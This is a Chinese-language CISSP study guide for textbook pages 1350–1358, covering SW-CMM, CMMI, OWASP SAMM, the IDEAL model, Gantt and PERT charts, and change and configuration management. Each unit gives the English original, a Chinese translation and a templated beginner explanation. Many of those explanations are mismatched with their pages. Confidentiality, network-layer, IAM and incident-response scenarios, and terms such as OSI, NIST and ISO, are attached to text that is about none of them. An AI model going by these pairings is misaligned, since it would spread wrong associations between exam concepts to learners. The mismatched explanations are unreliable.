这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 27 / PDF P1350

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Capability Maturity Model (CMM) The Software Engineering Institute (SEI) at Carnegie Mellon University introduced the Capability Maturity Model for Software, also known as the Software Capability Maturity Model (abbreviated as SW-CMM, CMM, or SCMM), which contends that all organizations engaged in software development move through a variety of maturity phases in sequential fashion. The SW-CMM describes the principles and practices underlying software process maturity. It is intended to help software organizations improve the maturity and quality of their software processes by implementing an evolutionary path from ad hoc, chaotic processes to mature, disciplined software processes.

The idea behind the SW-CMM is that the quality of software depends on the quality of its development process. SWCMM does not explicitly address security, but it is the responsibility of cybersecurity professionals and software developers to ensure that security requirements are integrated into the software development effort. The stages of the SW-CMM are as follows: Level 1: Initial In this phase, you'll often find hardworking people charging ahead in a disorganized fashion. There is usually little or no defined software development process. Level 2: Repeatable In this phase, basic life cycle management processes are introduced.

Reuse of code in an organized fashion begins to enter the picture, and repeatable results are expected from similar projects. SEI defines the key process areas for this level as Requirements Management, Software Project Planning, Software Project Tracking and Oversight, Software Subcontract Management, Software Quality Assurance, and Software Configuration Management. Level 3: Defined In this phase, software developers operate according to a set of formal, documented software development processes. All development projects take place within the constraints of the new standardized management model.

SEI defines the key process areas for this level as Organization Process Focus, Organization Process Definition, Training Program, Integrated Software Management, Software Product Engineering, Intergroup Coordination, and Peer Reviews. Level 4: Managed In this phase, management of the software process proceeds to the next level. Quantitative measures are used to gain a detailed understanding of the development process. SEI defines the key process areas

中文直译 / 整理

能力成熟度模型(CMM) 卡内基梅隆大学的软件工程研究所(SEI)提出了软件工程能力成熟度模型,也 称为软件能力成熟度模型(缩写为 SW‑CMM、CMM 或 SCMM),该模型认 为所有参与软件开发的组织都会依次经历一系列成熟度阶段。 SW‑CMM 描述 了软件过程成熟度所依据的原则和实践,旨在帮助软件组织通过从随意、混乱 的过程逐步演进到成熟、规范的软件过程,提升其软件过程的成熟度和质量。 SW‑CMM 的核心理念是,软件的质量取决于其开发过程的质量。 SW‑CMM 并未明确涉及安全性,但确保安全需求融入软件开发工作是网络安全专业人员 和软件开发人员的责任。 SW‑CMM的阶段如下: 第1级:初始级 在这一阶段,你经常会发现勤奋的员工在无序的状态下奋力前进。 通常几乎没有定义的软件开发流程。 第2级:可重复级 在这一阶段,引入了基本的生命周期管理流程。 以有组织的方 式重用代码开始出现,相似项目可产生可重复的结果。 SEI将本级别的关键过程 领域定义为:需求管理、软件项目计划、软件项目跟踪与监督、软件分包管理、 软件质量保证和软件配置管理。

第3级:已定义级 在这一阶段,软件开发人员按照一套正式的、文档化的软件开 发流程开展工作。 所有开发项目都在新的标准化管理模型的约束下进行。 SEI将 本级别的关键过程领域定义为:组织过程焦点、组织过程定义、培训计划、集成 软件管理、软件产品工程、跨组协调和同行评审。 第4级:已管理 在此阶段,软件过程的管理提升到下一个层次。 通过定量度量 来深入了解开发过程。 SEI定义了该级别的关键过程领域

小白解释

场景先行:你是公司的安全负责人,正在读第 1350 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
学习单元 28 / PDF P1351

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

for this level as Quantitative Process Management and Software Quality Management. Level 5: Optimizing In the optimized organization, a process of continuous improvement occurs. Sophisticated software development processes are in place that ensure that feedback from one phase reaches to the previous phase to improve future results. SEI defines the key process areas for this level as Defect Prevention, Technology Change Management, and Process Change Management. CMM has largely been superseded by a new model called the Capability Maturity Model Integration (CMMI). The CMMI uses the same five stages as the CMM but calls level 4 Quantitatively Managed, rather than Managed.

The major difference between CMM and CMMI is that CMM focuses on isolated processes, whereas CMMI focuses on the integration among those processes. Software Assurance Maturity Model (SAMM) The Software Assurance Maturity Model (SAMM) is an open-source project maintained by OWASP. It seeks to provide a framework for integrating security activities into the software development and maintenance process and to offer organizations the ability to assess their maturity. SAMM divides the software development process into five business functions: Governance The activities an organization undertakes to manage its software development process.

This function includes practices for strategy, metrics, policy, compliance, education, and guidance. Design The process used by the organization to define software requirements and create software. This function includes practices for threat modeling, threat assessment, security requirements, and security architecture. Implementation The process of building and deploying software components and managing flaws in those components. This function includes the secure build, secure deployment, and defect management practices.

中文直译 / 整理

为定量过程管理和软件质量管理。 第5级:优化在优化型组织中,会发生持续改进的过程。 已建立复杂的软件开 发流程,确保从一个阶段获得的反馈能够传递到前一阶段,以改进未来的结果。 SEI将该级别的关键过程领域定义为缺陷预防、技术变更管理和过程变更管理。 CMM在很大程度上已被一种名为能力成熟度模型集成(CMMI)的新 模型所取代。 CMMI使用与CMM相同的五个阶段,但将第4级称为量化管 理,而非管理。 CMM与CMMI的主要区别在于,CMM关注孤立的过程, 而CMMI则关注这些过程之间的集成。 软件保障成熟度模型(SAMM) 软件保障成熟度模型(SAMM)是由OWASP维护的开源项目。 它旨在提供 一个框架,将安全活动整合到软件开发和维护过程中,并帮助组织评估其成 熟度。 SAMM 将软件开发过程分为五个业务 功能: 治理 组织为管理其软件开发过程而开展的活动。 此功能包括策略、指标、政策、 合规、教育和指导方面的实践。 设计 组织用于定义软件需求并创建软件的过程。 此功能包括威胁建模、威胁评 估、安全需求和安全架构方面的实践。 实现 构建和部署软件组件并管理这些组件中缺陷的过程。

此功能包括安全构建、 安全部署和缺陷管理实践。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

越早做威胁建模,修复成本越低。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 29 / PDF P1352

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Verification The set of activities undertaken by the organization to confirm that code meets business and security requirements. This function includes architecture assessment, requirements-driven testing, and security testing. Operations The actions taken by an organization to maintain confidentiality, integrity, and availability throughout the software life cycle after code is released. This function includes incident management, environment management, and operational management. Each of these business functions is then broken out by applicable security practices, as shown in Figure 20.5.

FIGURE 20.5 Software Assurance Maturity Model IDEAL Model The Software Engineering Institute also developed the IDEAL model for software development, which implements many of the SW-CMM attributes. The IDEAL model has five phases: 1. Initiating: In the initiating phase of the IDEAL model, the business reasons behind the change are outlined, support is built for the initiative, and the appropriate infrastructure is put in place.

中文直译 / 整理

验证 组织为确认代码符合业务和安全要求而开展的一系列活动。 此功能包括架 构评估、需求驱动的测试和安全测试。 运营 组织在代码发布后,为在整个软件生命周期中保持机密性、完整性和可 用性而采取的行动。 此功能包括事件管理、环境管理和运营管理。 这些业务功能随后根据适用的安全实践进行细分,如图20.5所示。 图20.5 软件保障成熟度模型 IDEAL模型 软件工程学院还开发了用于软件开发的IDEAL模型,该模型实现了许多 SW‑CMM属性。 IDEAL模型包括五个阶段: 1. 启动:在IDEAL模型的启动阶段,将阐明变更的业务原因,建立对举措的 支持,并部署适当的基础设施。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
学习单元 30 / PDF P1353

第 1353 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

2. Diagnosing: During the diagnosing phase, engineers analyze the current state of the organization and make general recommendations for change. 3. Establishing: In the establishing phase, the organization takes the general recommendations from the diagnosing phase and develops a specific plan of action that helps achieve those changes. 4. Acting: In the acting phase, it's time to stop “talking the talk” and “walk the walk.” The organization develops solutions and then tests, refines, and implements them. 5.

Learning: As with any quality improvement process, the organization must continuously analyze its efforts to determine whether it has achieved the desired goals, and when necessary, propose new actions to put the organization back on course. The IDEAL model is illustrated in Figure 20.6. 2.

中文直译 / 整理

诊断:在诊断阶段,工程师分析组织的当前状态,并提出一般性改进建议。 3. 建立:在建立阶段,组织采纳诊断阶段提出的一般性建议,制定具体 的行动计划以实现这些变革。 4. 实施:在实施阶段,是时候停止“空谈”而开始“实干”了。 组织开发 解决方案,然后进行测试、优化和实施。 5. 学习:与任何质量改进过程一样,组织必须持续分析其努力,以确定是 否实现了预期目标,并在必要时提出新的行动,使组织重回正轨。 IDEAL模型如图20.6所示。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1353 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 31 / PDF P1354

第 1354 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 20.6 The IDEAL model Source: IDEAL Model, 2004 / Carnegie Mellon University.

中文直译 / 整理

图 20.6 IDEAL 模型 来源:IDEAL 模型,2004 年 / 卡内基梅隆大学。

小白解释

场景先行:你是公司的安全负责人,正在读第 1354 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1354 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 32 / PDF P1355

第 1355 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

SW-CMM and IDEAL Model Memorization To help you remember the initial letters of each of the 10 level names of the SW-CMM and IDEAL models (II DR ED AM LO), imagine yourself sitting on the couch in a psychiatrist's office saying, “I…I, Dr. Ed, am lo(w).” If you can remember that phrase, then you can extract the 10 initial letters of the level names. If you write the letters out into two columns, you can reconstruct the level names in order of the two systems. The left column is the IDEAL model, and the right represents the levels of the SW-CMM.

IDEAL PhasesSW-CMM Phases Initiating Initial Diagnosing Repeatable Establishing Defined Acting Managed Learning Optimizing Gantt Charts and PERT A Gantt chart is a type of bar chart that shows the interrelationships over time between projects and schedules. It provides a graphical illustration of a schedule that helps you plan, coordinate, and track specific tasks in a project. Gantt charts are particularly useful when coordinating tasks that require the use of the same team members or other resources. Figure 20.7 shows an example of a Gantt chart. SW‑CMM

中文直译 / 整理

和 IDEAL 模型记忆 为了帮助您记住 SW‑CMM 和 IDEAL 模型的 10 个级别名称的首字母 (II DR ED AM LO),请想象自己坐在精神科医生的沙发上,说:"我... 我,Dr. Ed,am lo(w)。 " 如果您能记住这句话,就可以提取出这 10 个 级别名称的首字母。 如果您将这些字母写成两列,就可以按顺序重建两个 系统的级别名称。 左侧一列是 IDEAL 模型,右侧代表 SW‑CMM 的级别。 IDEAL 阶段 SW‑CMM 阶段 启动 初始 诊断 可重复 建立 已定义 执行 管理 学习 优化 甘特图与PERT A 甘特图 是一种条形图,用于显示项目与计划之间随时间变化的相互关系。 它 以图形方式展示计划,帮助您规划、协调和跟踪项目中的特定任务。 当协调需 要使用相同团队成员或其他资源的任务时,甘特图特别有用。 图 20.7 展示了 一个甘特图的例子。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1355 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 33 / PDF P1356

第 1356 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 20.7 Gantt chart Program Evaluation Review Technique (PERT) is a project-scheduling tool used to judge the size of a software product in development and calculate the standard deviation (SD) for risk assessment. PERT relates the estimated lowest possible size, the most likely size, and the highest possible size of each component. The PERT chart clearly shows the dependencies between different project tasks. Project managers can use these size estimates and dependencies to better manage the time of team members and perform task scheduling. PERT is used to direct improvements to project management and software coding in order to produce more efficient software.

As the capabilities of programming and management improve, the actual produced size of software should be smaller. Change and Configuration Management Once software has been released into a production environment, users will inevitably request the addition of new features, correction of bugs, and other modifications to the code. Just as the organization developed a regimented process for developing software, they must also put a procedure in place to manage changes in an organized fashion. Those changes should then be logged to a central repository to support future auditing, investigation, troubleshooting, and analysis requirements.

中文直译 / 整理

图 20.7 甘特图 计划评审技术(PERT)是一种项目调度工具,用于评估开发中软件产品的规 模并计算风险评估的标准差(SD)。 PERT 将每个组件的估计最小规模、最可 能规模和最大规模关联起来。 PERT 图清晰地展示了不同项目任务之间的依赖 关系。 项目经理可以利用这些规模估计和依赖关系更好地管理团队成员的时间 并进行任务调度。 PERT 用于指导项目管理和软件编码的改进,以生产更高效 的软件。 随着编程和管理能力的提升,实际生产的软件规模应变得更小。 变更与配置管理 一旦软件被发布到生产环境,用户必然会要求添加新功能、修复漏洞以及其他 代码修改。 正如组织为软件开发制定了严格的流程一样,他们也必须建立一套 程序,以有组织的方式管理这些变更。 这些变更应记录到中央存储库中,以支 持未来的审计、调查、故障排除和分析需求。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

审计:审计记录主体行为,用于追责、复盘和取证。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1356 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

没有日志和身份绑定,就很难问责。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
审计 审计记录主体行为,用于追责、复盘和取证。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 34 / PDF P1357

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Change Management as a Security Tool Change management (also known as control management) plays an important role when monitoring systems in the controlled environment of a data center. One of the authors recently worked with an organization that used change management as an essential component of its efforts to detect unauthorized changes to computing systems. File integrity monitoring tools allow you to monitor a system for changes. This organization used such a tool to monitor hundreds of production servers. However, the organization quickly found itself overwhelmed by file modification alerts resulting from normal activity.

The author worked with them to tune the file integrity monitoring policies and integrate them with the organization's change management process. Now all file integrity alerts go to a centralized monitoring center, where administrators correlate them with approved changes. System administrators receive an alert only if the security team identifies a change that does not appear to correlate with an approved change request. This approach greatly reduced the time spent by administrators reviewing file integrity reports and improved the usefulness of the tool to security administrators.

The change management process has three basic components: Request Control The request control process provides an organized framework within which users can request modifications, managers can conduct cost/benefit analysis, and developers can prioritize tasks. Change Control The change control process is used by developers to recreate the situation encountered by the user and to analyze the appropriate changes to remedy the situation. It also provides an organized framework within which multiple developers can create and test a solution prior to rolling it out into a production environment. Change control includes conforming to quality control restrictions, developing tools for update or

中文直译 / 整理

作为安全工具的变更管理 变更管理(也称为控制管理)在数据中心受控环境中监控系统时发挥着重 要作用。 其中一位作者最近与一家组织合作,该组织将变更管理作为检测 计算系统未授权变更的关键组成部分。 文件完整性监控工具可让您监控系统中的变更。 该组织使用此类工具监控 数百台生产服务器。 然而,该组织很快发现,由正常活动引发的文件修改 警报数量过多,令人应接不暇。 作者与他们合作,调整了文件完整性监控 策略,并将其与组织的变更管理流程集成。 现在,所有文件完整性警报都 会发送到集中监控中心,管理员在此将警报与已批准的变更进行关联。 只 有当安全团队识别出与已批准变更请求无关的变更时,系统管理员才会收 到警报。 这种方法大大减少了管理员审查文件完整性报告所花费的时间,并提高了 该工具对安全管理员的实用性。 变更管理流程包含三个基本组成部分: 请求控制 请求控制流程为用户提供了一个有序的框架,以便用户可以提出 修改请求,管理者可以进行成本/效益分析,开发人员可以优先处理任务。 变更控制 变更控制流程供开发人员使用,以重现用户遇到的情况并分析适当的 更改以解决该情况。

它还提供了一个有组织的框架,使多个开发人员能够在将 解决方案部署到生产环境之前进行创建和测试。 变更控制包括遵守质量控制限 制、开发更新或

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 35 / PDF P1358

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

change deployment, properly documenting any coded changes, and restricting the effects of new code to minimize diminishment of security. Release Control Once the changes are finalized, they must be approved for release through the release control procedure. An essential step of the release control process is to double-check and ensure that any code inserted as a programming aid during the change process (such as debugging code and/or backdoors) is removed before releasing the new software to production. This process also ensures that only approved changes are made to production systems.

Release control should also include acceptance testing to ensure that any alterations to end-user work tasks are understood and functional. In addition to the change management process, security administrators should be aware of the importance of software configuration management (SCM). This process is used to control the version(s) of software used throughout an organization and to formally track and control changes to the software configuration. It has four main components: Configuration Identification During the configuration identification process, administrators document the configuration of covered software products throughout the organization.

Configuration Control The configuration control process ensures that changes to software versions are made in accordance with the change control and configuration management policies. Updates can be made only from authorized distributions in accordance with those policies. Configuration Status Accounting Formalized procedures are used to keep track of all authorized changes that take place. Configuration Audit A periodic configuration audit should be conducted to ensure that the actual production environment is consistent with the accounting records and that no unauthorized configuration changes have taken place.

Together, change and configuration management techniques form an important part of the software engineer's arsenal and protect the organization from development-related security issues. The DevOps Approach Recently, many technology professionals recognized a disconnect between the major IT functions of software development, quality assurance, and

中文直译 / 整理

变更部署、正确记录任何代码更改,并限制新代码的影响,以最小化对安全性的削 弱。 发布控制一旦更改完成,必须通过发布控制程序批准发布。 发布控制过程中的一 个关键步骤是双重检查并确保在更改过程中作为编程辅助插入的任何代码(例如 调试代码和/或后门)在将新软件发布到生产环境之前已被移除。 此过程还确保只 有经过批准的更改才能应用于生产系统。 发布控制还应包括验收测试,以确保对 最终用户工作任务的任何更改都被理解并正常运行。 除了变更管理流程外,安全管理员还应了解软件配置管理(SCM)的重要性。 该流程用于控制整个组织中使用的软件版本,并正式跟踪和控制软件配置的 更改。 它包含四个主要组成部分: 配置识别在配置识别过程中,管理员记录组织内所有受覆盖软件产品的配置。 配置控制配置控制流程确保软件版本的更改符合变更控制和配置管理策略。 只有 根据这些策略从授权分发源进行的更新才可执行。 配置状态会计 使用规范化程序来跟踪所有已授权的变更。 配置审计 应定期进行配置审计,以确保实际生产环境与会计记录一致,并且没 有发生未经授权的配置变更。

变更管理和配置管理技术共同构成了软件工程师工具箱中的重要部分,保护组 织免受与开发相关的安全问题影响。 DevOps 方法 最近,许多技术专业人士意识到软件开发、质量保证和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

